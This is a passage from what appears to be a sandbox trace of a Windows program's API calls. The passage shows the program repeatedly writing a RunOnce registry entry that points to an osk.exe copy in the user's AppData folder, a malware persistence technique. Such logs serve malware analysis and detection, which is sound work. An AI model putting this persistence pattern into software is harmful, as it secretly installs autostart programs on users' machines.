DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.977] KillTimer (hWnd=0x20280, uIDEvent=0x21c3) returned 1 [0085.977] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.978] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.978] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.978] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.978] RegCloseKey (hKey=0x280) returned 0x0 [0085.978] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.979] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.979] SetTimer (hWnd=0x20280, nIDEvent=0x21c4, uElapse=0xa, lpTimerFunc=0x0) returned 0x21c4 [0085.979] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.993] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.993] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.993] KillTimer (hWnd=0x20280, uIDEvent=0x21c4) returned 1 [0085.993] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.993] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.993] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.994] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.994] RegCloseKey (hKey=0x280) returned 0x0 [0085.994] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.994] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.994] SetTimer (hWnd=0x20280, nIDEvent=0x21c5, uElapse=0xa, lpTimerFunc=0x0) returned 0x21c5 [0085.994] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0086.008] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0086.008] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0086.008] KillTimer (hWnd=0x20280, uIDEvent=0x21c5) returned 1 [0086.009] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.009] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0086.009] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0086.009] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0086.009] RegCloseKey (hKey=0x280) returned 0x0 [0086.010] IUnknown:Release (This=0x7a9740) returned 0x1 [0086.010] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.010] SetTimer (hWnd=0x20280, nIDEvent=0x21c6, uElapse=0xa, lpTimerFunc=0x0) returned 0x21c6 [0086.010] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0086.025] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0086.025] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0086.025] KillTimer (hWnd=0x20280, uIDEvent=0x21c6) returned 1 [0086.025] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.026] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0086.026] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0086.026] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0086.026] RegCloseKey (hKey=0x280) returned 0x0 [0086.026] IUnknown:Release (This=0x7a9740) returned 0x1 [0086.026] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.026] SetTimer (hWnd=0x20280, nIDEvent=0x21c7, uElapse=0xa, lpTimerFunc=0x0) returned 0x21c7 [0086.026] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0086.040] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0086.040] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0086.041] KillTimer (hWnd=0x20280, uIDEvent=0x21c7) returned 1 [0086.041] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.041] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0086.041] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0086.042] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0086.042] RegCloseKey (hKey=0x280) returned 0x0 [0086.042] IUnknown:Release (This=0x7a9740) returned 0x1 [0086.042] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.042] SetTimer (hWnd=0x20280, nIDEvent=0x21c8, uElapse=0xa, lpTimerFunc=0x0) returned 0x21c8 [0086.042] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0086.055] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0086.055] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0086.055] KillTimer (hWnd=0x20280, uIDEvent=0x21c8) returned 1 [0086.056] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.056] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0086.056] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0086.056] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0086.056] RegCloseKey (hKey=0x280) returned 0x0 [0086.057] IUnknown:Release (This=0x7a9740) returned 0x1 [0086.057] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.057] SetTimer (hWnd=0x20280, nIDEvent=0x21c9, uElapse=0xa, lpTimerFunc=0x0) returned 0x21c9 [0086.057] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0086.071] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0086.071] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0086.071] KillTimer (hWnd=0x20280, uIDEvent=0x21c9) returned 1 [0086.071] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.072] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0086.072] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0086.072] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0086.072] RegCloseKey (hKey=0x280) returned 0x0 [0086.072] IUnknown:Release (This=0x7a9740) returned 0x1 [0086.072] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.072] SetTimer (hWnd=0x20280, nIDEvent=0x21ca, uElapse=0xa, lpTimerFunc=0x0) returned 0x21ca [0086.072] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0086.086] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0086.086] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0086.086] KillTimer (hWnd=0x20280, uIDEvent=0x21ca) returned 1 [0086.087] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.087] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0086.087] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0086.087] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0086.088] RegCloseKey (hKey=0x280) returned 0x0 [0086.088] IUnknown:Release (This=0x7a9740) returned 0x1 [0086.088] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.088] SetTimer (hWnd=0x20280, nIDEvent=0x21cb, uElapse=0xa, lpTimerFunc=0x0) returned 0x21cb [0086.088] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0086.102] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0086.102] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0086.102] KillTimer (hWnd=0x20280, uIDEvent=0x21cb) returned 1 [0086.102] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.103] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0086.103] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0086.103] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0086.103] RegCloseKey (hKey=0x280) returned 0x0 [0086.103] IUnknown:Release (This=0x7a9740) returned 0x1 [0086.103] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.103] SetTimer (hWnd=0x20280, nIDEvent=0x21cc, uElapse=0xa, lpTimerFunc=0x0) returned 0x21cc [0086.103] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0086.118] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0086.118] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0086.118] KillTimer (hWnd=0x20280, uIDEvent=0x21cc) returned 1 [0086.118] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.118] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0086.119] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0086.119] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0086.119] RegCloseKey (hKey=0x280) returned 0x0 [0086.119] IUnknown:Release (This=0x7a9740) returned 0x1 [0086.119] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.119] SetTimer (hWnd=0x20280, nIDEvent=0x21cd, uElapse=0xa, lpTimerFunc=0x0) returned 0x21cd [0086.119] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0086.133] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0086.133] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0086.133] KillTimer (hWnd=0x20280, uIDEvent=0x21cd) returned 1 [0086.134] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.134] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0086.134] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0086.134] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0086.135] RegCloseKey (hKey=0x280) returned 0x0 [0086.135] IUnknown:Release (This=0x7a9740) returned 0x1 [0086.135] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.135] SetTimer (hWnd=0x20280, nIDEvent=0x21ce, uElapse=0xa, lpTimerFunc=0x0) returned 0x21ce [0086.135] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0086.149] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0086.149] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0086.149] KillTimer (hWnd=0x20280, uIDEvent=0x21ce) returned 1 [0086.149] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.149] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0086.149] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0086.150] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0086.150] RegCloseKey (hKey=0x280) returned 0x0 [0086.150] IUnknown:Release (This=0x7a9740) returned 0x1 [0086.150] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.150] SetTimer (hWnd=0x20280, nIDEvent=0x21cf, uElapse=0xa, lpTimerFunc=0x0) returned 0x21cf [0086.150] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0086.164] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0086.164] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0086.165] KillTimer (hWnd=0x20280, uIDEvent=0x21cf) returned 1 [0086.165] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.165] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0086.165] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0086.165] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0086.166] RegCloseKey (hKey=0x280) returned 0x0 [0086.166] IUnknown:Release (This=0x7a9740) returned 0x1 [0086.166] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.166] SetTimer (hWnd=0x20280, nIDEvent=0x21d0, uElapse=0xa, lpTimerFunc=0x0) returned 0x21d0 [0086.166] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0086.193] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0086.193] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0086.193] KillTimer (hWnd=0x20280, uIDEvent=0x21d0) returned 1 [0086.194] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.194] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0086.194] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0086.194] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0086.195] RegCloseKey (hKey=0x280) returned 0x0 [0086.195] IUnknown:Release (This=0x7a9740) returned 0x1 [0086.195] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.195] SetTimer (hWnd=0x20280, nIDEvent=0x21d1, uElapse=0xa, lpTimerFunc=0x0) returned 0x21d1 [0086.195] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0086.195] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0086.195] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0086.196] KillTimer (hWnd=0x20280, uIDEvent=0x21d1) returned 1 [0086.196] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.196] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0086.196] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0086.196] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0086.197] RegCloseKey (hKey=0x280) returned 0x0 [0086.197] IUnknown:Release (This=0x7a9740) returned 0x1 [0086.197] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.197] SetTimer (hWnd=0x20280, nIDEvent=0x21d2, uElapse=0xa, lpTimerFunc=0x0) returned 0x21d2 [0086.197] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0086.211] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0086.211] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0086.211] KillTimer (hWnd=0x20280, uIDEvent=0x21d2) returned 1 [0086.212] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.212] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0086.212] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0086.212] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0086.213] RegCloseKey (hKey=0x280) returned 0x0 [0086.213] IUnknown:Release (This=0x7a9740) returned 0x1 [0086.213] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.213] SetTimer (hWnd=0x20280, nIDEvent=0x21d3, uElapse=0xa, lpTimerFunc=0x0) returned 0x21d3 [0086.213] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0086.227] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0086.227] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0086.227] KillTimer (hWnd=0x20280, uIDEvent=0x21d3) returned 1 [0086.228] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.228] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0086.228] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0086.228] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0086.229] RegCloseKey (hKey=0x280) returned 0x0 [0086.229] IUnknown:Release (This=0x7a9740) returned 0x1 [0086.229] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.229] SetTimer (hWnd=0x20280, nIDEvent=0x21d4, uElapse=0xa, lpTimerFunc=0x0) returned 0x21d4 [0086.229] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0086.242] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0086.242] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0086.242] KillTimer (hWnd=0x20280, uIDEvent=0x21d4) returned 1 [0086.243] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.243] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0086.243] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0086.243] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0086.243] RegCloseKey (hKey=0x280) returned 0x0 [0086.244] IUnknown:Release (This=0x7a9740) returned 0x1 [0086.244] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.244] SetTimer (hWnd=0x20280, nIDEvent=0x21d5, uElapse=0xa, lpTimerFunc=0x0) returned 0x21d5 [0086.244] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0086.258] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0086.258] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0086.258] KillTimer (hWnd=0x20280, uIDEvent=0x21d5) returned 1 [0086.258] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.259] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0086.259] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0086.259] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, 